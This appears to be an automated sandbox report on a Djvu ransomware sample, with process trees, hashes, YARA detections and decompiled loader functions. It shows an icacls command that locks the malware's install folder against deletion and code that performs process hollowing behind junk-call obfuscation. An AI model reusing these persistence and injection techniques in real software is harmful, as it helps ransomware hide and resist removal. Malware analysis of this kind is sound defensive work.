                                                                                    Commandline:icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                    Imagebase:0xe80000
                                                                                    File size:29696 bytes
                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:29:58
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:29:59
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 56%, ReversingLabs
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:06
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:07
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:13
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:14
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:15
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:30:23
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Disassembly

                                                                                    Code Analysis


                                                                                      Executed Functions

                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00840156
                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0084016C
                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00840255
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00840270
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00840283
                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 0084029F
                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008402C8
                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008402E3
                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00840304
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0084032A
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00840399
                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008403BF
                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 008403E1
                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 008403ED
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00840412
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                      • String ID:
                                                                                      • API String ID: 2875986403-0
                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction ID: f5f8de249a752b23cefbed054c34972100b3b01ad2f9152e341a78e3a24bcf60
                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction Fuzzy Hash: 9DB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D771AE41CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(user32), ref: 008406E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                                                                                      • API String ID: 1029625771-3105132389
                                                                                      • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction ID: 0212bf60b5300e84f5dc61bcab4a023a4be99f6a185c8f90d2499f9673fa9875
                                                                                      • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction Fuzzy Hash: 68A25460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9818C66292C7BB1B98CF76
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00401AD1(void* __ebx, void* __edx, void* __ebp) {
                                                                                      				long _v4;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HINSTANCE__* _t3;
                                                                                      				intOrPtr _t8;
                                                                                      				void* _t13;
                                                                                      				void* _t17;
                                                                                      				void* _t32;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t35;
                                                                                      				void* _t36;
                                                                                      				void* _t37;
                                                                                      				void* _t38;
                                                                                      				intOrPtr* _t41;
                                                                                      
                                                                                      				_t33 = __edx;
                                                                                      				_t31 = __ebx;
                                                                                      				_t43 =  *0x4b8384 - 0x20a;
                                                                                      				if( *0x4b8384 == 0x20a) {
                                                                                      					ReleaseSemaphore(0, 0, 0);
                                                                                      					E00403C43(__ebx, _t33, _t34, 0);
                                                                                      					 *_t41 = 0x929;
                                                                                      					_push(0xea);
                                                                                      					E00403BB4(_t32, _t43);
                                                                                      					E00403F3E("0.txt", "rb");
                                                                                      					_push(0);
                                                                                      					E0040417A(__ebx, _t33, _t34, 0, _t43);
                                                                                      					_push(0);
                                                                                      					_push(0);
                                                                                      					_push(0);
                                                                                      					E00404272(_t31, _t33, _t34, 0, _t43);
                                                                                      				}
                                                                                      				E00401ABD();
                                                                                      				_t3 = GetModuleHandleA(0x4b03d8);
                                                                                      				 *0x4b6f88 = _t3;
                                                                                      				 *0x4b6f84 = GetProcAddress(_t3, "LocalAlloc");
                                                                                      				E00401AA9();
                                                                                      				VirtualProtect( *0x4b3d8c,  *0x4b8384, 0x40,  &_v4); // executed
                                                                                      				_t35 = 0;
                                                                                      				L3:
                                                                                      				L3:
                                                                                      				if(_t35 < 0x50956) {
                                                                                      					GetCurrentProcessId();
                                                                                      				}
                                                                                      				if(_t35 > 0x1ee94b8e) {
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				_t35 = _t35 + 1;
                                                                                      				if(_t35 < 0x5c83a611) {
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				L7:
                                                                                      				_t8 =  *0x4af1ec; // 0x362ff5
                                                                                      				 *0x4b8388 = _t8;
                                                                                      				E00401A6E(_t32);
                                                                                      				_t36 = 0;
                                                                                      				if( *0x4b8384 > 0) {
                                                                                      					do {
                                                                                      						if( *0x4b8384 == 0x44) {
                                                                                      							WriteConsoleW(0, 0, 0, 0, 0);
                                                                                      							GetCommandLineA();
                                                                                      						}
                                                                                      						_t36 = _t36 + 1;
                                                                                      					} while (_t36 <  *0x4b8384);
                                                                                      				}
                                                                                      				_t37 = 0;
                                                                                      				do {
                                                                                      					if( *0x4b8384 + _t37 == 0x5e) {
                                                                                      						GlobalDeleteAtom(0);
                                                                                      						HeapReAlloc(0, 0, 0, 0);
                                                                                      						GetFileAttributesA("beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli");
                                                                                      					}
                                                                                      					_t37 = _t37 + 1;
                                                                                      				} while (_t37 < 0x40c893);
                                                                                      				E0040199A();
                                                                                      				_t13 = 0;
                                                                                      				do {
                                                                                      					if(_t13 == 0x560e) {
                                                                                      						 *0x4b3d8c =  *0x4b3d8c;
                                                                                      					}
                                                                                      					_t13 = _t13 + 1;
                                                                                      				} while (_t13 < 0x89b2159a);
                                                                                      				_t38 = 0x7b;
                                                                                      				do {
                                                                                      					if( *0x4b8384 == 0x89) {
                                                                                      						RemoveDirectoryA("ojodobagulay");
                                                                                      						lstrlenW(L"Powu bekitahexozoman yoxefo");
                                                                                      						FlushFileBuffers(0);
                                                                                      					}
                                                                                      					_t38 = _t38 - 1;
                                                                                      				} while (_t38 != 0);
                                                                                      				_t17 =  *0x4b3d8c;
                                                                                      				 *0x4b6f8c = _t17;
                                                                                      				return  *_t17();
                                                                                      			}
                                                                                      0x00401c42
                                                                                      0x00401c42
                                                                                      0x00401c45
                                                                                      0x00401c4a
                                                                                      0x00401c54

APIs
• ReleaseSemaphore.KERNEL32(00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401AE5
• _malloc.LIBCMT ref: 00401AEC
  • Part of subcall function 00403C43: __FF_MSGBANNER.LIBCMT ref: 00403C66
  • Part of subcall function 00403C43: __NMSG_WRITE.LIBCMT ref: 00403C6D
  • Part of subcall function 00403C43: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040670A,00000001,00000001,00000001,?,00407543,00000018,004AB630,0000000C,004075D4), ref: 00403CBA
• _calloc.LIBCMT ref: 00401AFD
  • Part of subcall function 00403BB4: __calloc_impl.LIBCMT ref: 00403BC9
  • Part of subcall function 00403F3E: __fsopen.LIBCMT ref: 00403F4B
• _ftell.LIBCMT ref: 00401B12
• _fseek.LIBCMT ref: 00401B1A
• GetModuleHandleA.KERNEL32(004B03D8,?,?,?,00401CD0), ref: 00401B2C
• GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 00401B3D
• VirtualProtect.KERNELBASE(00000040,00401CD0,?,?,?,00401CD0), ref: 00401B60
• GetCurrentProcessId.KERNEL32(?,?,?,00401CD0), ref: 00401B70
• WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401BAE
• GetCommandLineA.KERNEL32(?,?,?,00401CD0), ref: 00401BB4
• GlobalDeleteAtom.KERNEL32 ref: 00401BD2
• HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00401CD0), ref: 00401BDC
• GetFileAttributesA.KERNEL32(beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli,?,?,?,00401CD0), ref: 00401BE7
• RemoveDirectoryA.KERNEL32(ojodobagulay,?,?,?,00401CD0), ref: 00401C2A
• lstrlenW.KERNEL32(Powu bekitahexozoman yoxefo,?,?,?,00401CD0), ref: 00401C35
• FlushFileBuffers.KERNEL32(00000000,?,?,?,00401CD0), ref: 00401C3C
Strings
• LocalAlloc, xrefs: 00401B32
• ojodobagulay, xrefs: 00401C25
• Powu bekitahexozoman yoxefo, xrefs: 00401C30
• beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli, xrefs: 00401BE2
• 0.txt, xrefs: 00401B07
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: FileHeap$AddressAllocAllocateAtomAttributesBuffersCommandConsoleCurrentDeleteDirectoryFlushGlobalHandleLineModuleProcProcessProtectReleaseRemoveSemaphoreVirtualWrite__calloc_impl__fsopen_calloc_fseek_ftell_malloclstrlen
• String ID: 0.txt$LocalAlloc$Powu bekitahexozoman yoxefo$beyayepimerucamirijajo wazonepilukohayuricetarizefaw zutujowizeba finomacuramuvuwojof gisakeli$ojodobagulay
• API String ID: 1956735600-916741302
• Opcode ID: 363802e45cbc1e9938f1d9259d512af34c8340fabf9808789e9bdde61538a9e7
• Instruction ID: 64368fc77fc5fb3f68982e266deba3e8a23f621c9627160507ed0ea6518736cb
• Opcode Fuzzy Hash: 363802e45cbc1e9938f1d9259d512af34c8340fabf9808789e9bdde61538a9e7
• Instruction Fuzzy Hash: F631BC31649210ABD7216BA2EC49A5F3FA8FB57756B00003FF505A21F1DB3C5942DB6D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00840533
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
• API String ID: 716092398-2341455598
• Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
• Instruction ID: 95aadb861234f5c93da3ae3891cbba4ad94096095da4063eb71f5f46e9fea03a
• Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
• Instruction Fuzzy Hash: DB511870D0838CDAEB11CBE8C849BDEBFB2AF15708F144058D5447F286C3BA5A58CB66
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNELBASE(apfHQ), ref: 008405EC
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: AttributesFile
• String ID: apfHQ$o
• API String ID: 3188754299-2999369273
• Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
• Instruction ID: 960d3b2adbcd2fc861a1b3a4fba5e72a4b194e7621fa6257f60437c1381a9697
• Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
• Instruction Fuzzy Hash: 2C011A70C0424CEADB10DBE8C5183AEBFB5EF51309F148099C5496B242D7B69B98CBA2
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040B13B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				intOrPtr _t13; // size of the environment block in bytes (declaration was missing in the decompiler output)
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E004066F9(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00406C90(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

APIs
• GetEnvironmentStringsW.KERNEL32(00000000,004045EF), ref: 0040B13E
• __malloc_crt.LIBCMT ref: 0040B16C
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B179
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: e3af86716b64e7d49d5fc5e182e04f7ef26196038bc93161ff07307a014f1b80
• Instruction ID: ca23129a2f02d370f4ac4abbfd9ac60cbdd04e1e8a459185563b94de5e45c62a
• Opcode Fuzzy Hash: e3af86716b64e7d49d5fc5e182e04f7ef26196038bc93161ff07307a014f1b80
• Instruction Fuzzy Hash: B0F0E236608020AECB203A397C5C8771669DAD63A9312483BF893E7380F7384C4382ED
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040740D(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4af848 = _t6;
				if(_t6 != 0) {
					 *0x4b94f4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407422
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: eca62a75e17241b7887f2d816f82f642ed127b2d44714594b06c0855d4a465d0
• Instruction ID: 723b12508e055011cd5bc8d1319752aa9f0a4f64188f0caa3db623c13eea80a9
• Opcode Fuzzy Hash: eca62a75e17241b7887f2d816f82f642ed127b2d44714594b06c0855d4a465d0
• Instruction Fuzzy Hash: D9D0A7329583059FDB105FB0BC48B633FECD384395F108436B91CC6190F674D940D588
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00408A0C() {
				void* _t1;

				_t1 = E0040899A(0); // executed
				return _t1;
			}

APIs
• __encode_pointer.LIBCMT ref: 00408A0E
  • Part of subcall function 0040899A: TlsGetValue.KERNEL32(00000000,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 004089AC
  • Part of subcall function 0040899A: TlsGetValue.KERNEL32(00000001,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 004089C3
  • Part of subcall function 0040899A: RtlEncodePointer.NTDLL(00000000,?,00408A13,00000000,0040FCAD,004AF9D8,00000000,00000314,?,00408861,004AF9D8,Microsoft Visual C++ Runtime Library,00012010), ref: 00408A01
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: Value$EncodePointer__encode_pointer
• String ID:
• API String ID: 2585649348-0
• Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
• Instruction ID: 4d8e19e985049fc054a2def13dc21817a3077e3b6309cd7b6af457893be6d37e
• Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
• Instruction Fuzzy Hash:
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00401AA9() {
				void* _t1;

				// GlobalAlloc(GMEM_FIXED, size): flags 0 = GMEM_FIXED, size read from the global at 0x4b8384.
				// The returned buffer pointer is kept in the global at 0x4b3d8c. "executed" is the sandbox's
				// mark that this line ran during the analysis (matching the GlobalAlloc entry under APIs below).
				_t1 = GlobalAlloc(0,  *0x4b8384); // executed
				 *0x4b3d8c = _t1;
				return _t1;
			}

Instruction addresses (the disassembly column was not extracted; only the addresses survive): 0x00401ab1, 0x00401ab7, 0x00401abc

APIs
• GlobalAlloc.KERNELBASE(00000000,00401B4D,?,?,?,00401CD0), ref: 00401AB1
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
